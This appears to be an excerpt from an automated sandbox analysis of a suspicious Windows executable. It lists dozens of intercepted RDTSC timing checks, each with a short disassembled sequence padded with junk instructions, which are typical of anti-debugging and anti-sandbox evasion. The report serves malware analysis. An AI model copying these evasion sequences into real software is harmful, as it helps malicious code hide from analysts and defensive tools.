Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78E10 second address: D78E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F8CE4DC41A8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F8CE4DC41B4h 0x00000028 xor dl, 0000003Bh 0x0000002b mov ebx, dword ptr [ebp+12479E57h] 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F8CE4DC41A8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b add eax, ebx 0x0000004d mov edx, edi 0x0000004f nop 0x00000050 je 00007F8CE4DC41B9h 0x00000056 pushad 0x00000057 jmp 00007F8CE4DC41AFh 0x0000005c pushad 0x0000005d popad 0x0000005e popad 0x0000005f push eax 0x00000060 js 00007F8CE4DC41B4h 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCDFC0 second address: DCDFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD1DBB second address: DD1DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD1DC0 second address: DD1DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F8CE470D04Fh 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8CE470D046h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD1F0D second address: DD1F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a js 00007F8CE4DC41A6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jnl 00007F8CE4DC41AEh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD2318 second address: DD2322 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CE470D04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DD5717 second address: DD573A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8CE4DC41ABh 0x0000000d pushad 0x0000000e jmp 00007F8CE4DC41ADh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB030 second address: DDB034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB339 second address: DDB343 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB911 second address: DDB91B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB91B second address: DDB934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB934 second address: DDB94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D051h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB94B second address: DDB953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDB953 second address: DDB959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC3F5 second address: DDC3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DDC99F second address: DDC9AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE739B second address: DE73A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE73A7 second address: DE73B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE73B9 second address: DE73C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE64EA second address: DE6505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F8CE470D053h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6505 second address: DE6516 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE4DC41ACh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6516 second address: DE6522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6522 second address: DE6528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6682 second address: DE668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE668D second address: DE669C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F8CE4DC41A6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6B36 second address: DE6B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D050h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE6B4A second address: DE6B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F8CE4DC41A6h 0x0000000f jng 00007F8CE4DC41A6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE7102 second address: DE7125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D057h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F8CE470D046h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DE7125 second address: DE7129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF07C6 second address: DF07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEC8D second address: DEEC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEC98 second address: DEECB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE470D052h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEECB2 second address: DEECB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEECB8 second address: DEECBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEECBC second address: DEECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jmp 00007F8CE4DC41B4h 0x00000012 jnl 00007F8CE4DC41A6h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEECE4 second address: DEECF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CE470D04Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEFC1 second address: DEEFD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEFD3 second address: DEEFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 js 00007F8CE470D046h 0x0000000f jo 00007F8CE470D046h 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEEFEF second address: DEF00E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8CE4DC41B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF00E second address: DEF01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F8CE470D046h 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF14B second address: DEF179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 jmp 00007F8CE4DC41B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F8CE4DC41ACh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF3D3 second address: DEF3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF3E9 second address: DEF3F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF5A3 second address: DEF5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F8CE470D046h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF5AF second address: DEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DEF5B3 second address: DEF5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE470D046h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jne 00007F8CE470D046h 0x00000013 jng 00007F8CE470D046h 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jne 00007F8CE470D060h 0x00000022 push eax 0x00000023 jo 00007F8CE470D046h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF0625 second address: DF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5A8D second address: DF5A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5A91 second address: DF5AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5D3B second address: DF5D5E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE470D05Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5D5E second address: DF5D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DF5D68 second address: DF5D74 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00B78 second address: E00B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8CE4DC41A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E062A0 second address: E062A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E062A4 second address: E062A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E062A8 second address: E062B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F8CE470D046h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E062B7 second address: E062E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F8CE4DC41B5h 0x0000000c jns 00007F8CE4DC41AEh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E05CA9 second address: E05CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CE470D046h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0B793 second address: E0B7CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8CE4DC41B1h 0x00000008 pop esi 0x00000009 push edi 0x0000000a jnp 00007F8CE4DC41A6h 0x00000010 jns 00007F8CE4DC41A6h 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F8CE4DC41B0h 0x00000021 jmp 00007F8CE4DC41AAh 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0B7CD second address: E0B7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0B7D3 second address: E0B7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F16C second address: E0F17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E0F17A second address: E0F18D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E17AE2 second address: E17AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E17AE6 second address: E17AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F8CE4DC41A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E17AF6 second address: E17B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F8CE470D04Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E17B18 second address: E17B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E200DA second address: E200F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jo 00007F8CE470D04Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2025F second address: E20291 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE4DC41BDh 0x00000008 push edi 0x00000009 jmp 00007F8CE4DC41B0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E203FF second address: E20414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jns 00007F8CE470D046h 0x0000000e jnl 00007F8CE470D046h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20881 second address: E20887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20887 second address: E2088B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2088B second address: E208A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E209E9 second address: E20A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D053h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20A02 second address: E20A22 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CE4DC41B4h 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F8CE4DC41A6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20A22 second address: E20A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20A26 second address: E20A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20B97 second address: E20BCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 jns 00007F8CE470D046h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8CE470D059h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E20BCC second address: E20BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F2A second address: E22F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F30 second address: E22F3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F3B second address: E22F52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F52 second address: E22F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F58 second address: E22F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007F8CE470D082h 0x0000000c jp 00007F8CE470D04Eh 0x00000012 jno 00007F8CE470D046h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8CE470D056h 0x00000021 jmp 00007F8CE470D04Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E22F96 second address: E22F9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E2D561 second address: E2D569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E315BF second address: E315C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E315C7 second address: E315D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E315D3 second address: E315D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E42A77 second address: E42A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F8CE470D052h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F8CE470D046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E428AC second address: E428B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CE4DC41A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E428B8 second address: E428D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D053h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
